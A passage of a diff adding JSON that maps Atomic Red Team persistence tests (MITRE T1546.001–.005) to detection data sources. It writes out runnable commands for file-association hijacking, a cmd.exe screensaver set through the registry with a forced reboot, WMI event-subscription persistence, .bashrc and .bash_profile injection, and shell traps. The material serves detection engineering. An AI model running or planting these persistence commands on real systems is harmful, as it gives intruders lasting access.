"target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1546.001", + "command_list": [ + "assoc #{extension_to_change}=txtfile\n", + "assoc .hta=#{target_extension_handler}\n", + "assoc #{extension_to_change}=#{target_extension_handler}\n" + ], + "commands": [ + { + "command": "assoc #{extension_to_change}=txtfile\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + }, + { + "command": "assoc .hta=#{target_extension_handler}\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + }, + { + "command": "assoc #{extension_to_change}=#{target_extension_handler}\n", + "source": "atomics/T1546.001/T1546.001.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Change Default File Association" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.001", + "display_name": "Event Triggered Execution: Change Default File Association", + "atomic_tests": [ + { + "name": "Change Default File Association", + "auto_generated_guid": "10a08978-2045-4d62-8c42-1957bbbea102", + "description": "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon successful execution, cmd.exe will change the file association of .hta to notepad.exe. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_extension_handler": { + "description": "txtfile maps to notepad.exe", + "type": "Path", + "default": "txtfile" + }, + "extension_to_change": { + "description": "File Extension To Hijack", + "type": "String", + "default": ".hta" + }, + "original_extension_handler": { + "description": "File Extension To Revert", + "type": "String", + "default": "htafile" + } + }, + "executor": { + "command": "assoc #{extension_to_change}=#{target_extension_handler}\n", + "cleanup_command": "assoc #{extension_to_change}=#{original_extension_handler}\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1546.002", + "command_list": [ + "copy C:\\Windows\\System32\\cmd.exe \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n" + ], + "commands": [ + { + "command": "copy C:\\Windows\\System32\\cmd.exe \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n", + "source": "atomics/T1546.002/T1546.002.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Screensaver" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.002", + "display_name": "Event Triggered Execution: Screensaver", + "atomic_tests": [ + { + "name": "Set Arbitrary Binary as Screensaver", + "auto_generated_guid": "281201e7-de41-4dc9-b73d-f288938cbb64", + "description": "This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_binary": { + "description": "Executable binary to use in place of screensaver for persistence", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "copy #{input_binary} \"%SystemRoot%\\System32\\evilscreensaver.scr\"\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeout /t REG_SZ /d 60 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f\nreg.exe add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d \"%SystemRoot%\\System32\\evilscreensaver.scr\" /f\nshutdown /r /t 0\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.003", + "command_list": [ + "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n" + ], + "commands": [ + { + "command": "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n", + "source": "atomics/T1546.003/T1546.003.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Windows Management Instrumentation Event Subscription" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.003", + "display_name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription", + "atomic_tests": [ + { + "name": "Persistence via WMI Event Subscription", + "auto_generated_guid": "3c64f177-28e2-49eb-a799-d767b24dd1e0", + "description": "Run from an administrator powershell window. After running, reboot the victim machine.\nAfter it has been online for 4 minutes you should see notepad.exe running as SYSTEM.\n\nCode references\n\nhttps://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af\n\nhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n", + "cleanup_command": "$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \"Name = 'AtomicRedTeam-WMIPersistence-Example'\"\n$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \"Name = 'AtomicRedTeam-WMIPersistence-Example'\"\n$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \"REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding\" -ErrorAction SilentlyContinue\n$FilterConsumerBindingToCleanup | Remove-WmiObject\n$EventConsumerToCleanup | Remove-WmiObject\n$EventFilterToCleanup | Remove-WmiObject\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "wmi", + "definition": "Information about objects from system classes (such as providers, filters, and consumers) that support Windows Management Instrumentation (WMI) activitites.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "wmi creation", + "description": "A WMI object (filter, consumer, subscription, binding, provider) was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "wmi object" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + ] + ] + }, + { + "technique_id": "T1546.004", + "command_list": [ + "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bash_profile\n", + "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bashrc\n" + ], + "commands": [ + { + "command": "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bash_profile\n", + "source": "atomics/T1546.004/T1546.004.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc" + }, + { + "command": "echo 'echo \"Hello from Atomic Red Team T1546.004\"' >> ~/.bashrc\n", + "source": "atomics/T1546.004/T1546.004.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.004", + "display_name": "Event Triggered Execution: .bash_profile and .bashrc", + "atomic_tests": [ + { + "name": "Add command to .bash_profile", + "auto_generated_guid": "94500ae1-7e31-47e3-886b-c328da46872f", + "description": "Adds a command to the .bash_profile file of the current user\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .bash_profile file", + "type": "String", + "default": "echo \"Hello from Atomic Red Team T1546.004\"" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.bash_profile\n", + "cleanup_command": "sed -i '/#{command_to_add}/d' ~/.bash_profile\n", + "name": "sh" + } + }, + { + "name": "Add command to .bashrc", + "auto_generated_guid": "0a898315-4cfa-4007-bafe-33a4646d115f", + "description": "Adds a command to the .bashrc file of the current user\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .bashrc file", + "type": "String", + "default": "echo \"Hello from Atomic Red Team T1546.004\"" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.bashrc\n", + "cleanup_command": "sed -i '/#{command_to_add}/d' ~/.bashrc\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.005", + "command_list": [ + "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n" + ], + "commands": [ + { + "command": "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n", + "source": "atomics/T1546.005/T1546.005.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Trap" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.005", + "display_name": "Event Triggered Execution: Trap", + "atomic_tests": [ + { + "name": "Trap", + "auto_generated_guid": "a74b2e07-5952-4c03-8b56-56274b076b61", + "description": "After exiting the shell, the script will download and execute.\nAfter sending a keyboard interrupt (CTRL+C) the script will download and execute.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" EXIT\nexit\ntrap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash\" SIGINt\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 